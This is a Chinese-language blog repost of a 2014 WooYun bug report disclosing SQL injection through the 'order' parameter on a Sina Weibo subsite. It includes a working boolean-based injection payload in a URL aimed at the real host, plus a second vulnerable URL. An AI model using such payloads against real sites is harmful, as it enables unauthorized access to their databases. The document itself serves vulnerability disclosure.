记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新浪微博某分站存在多处SQL注射

2014-10-15 01:30

注入1:

http://xueyuan.weibo.com/teacher/allteacher?page=1&level=&order_field=0&order=desc,if%28%281=1%29,1,%28select%201%20union%20select%202%29%29%20desc



注入2:

http://xueyuan.weibo.com/myschool/index?page=1&order_field=1&order=desc



没细查,应该相关的也存在。这里用多不知合适不。。



注入参数是 order



漏洞证明:

1.jpg

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2014-074500

阅读:71897 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪微博某分站存在多处SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云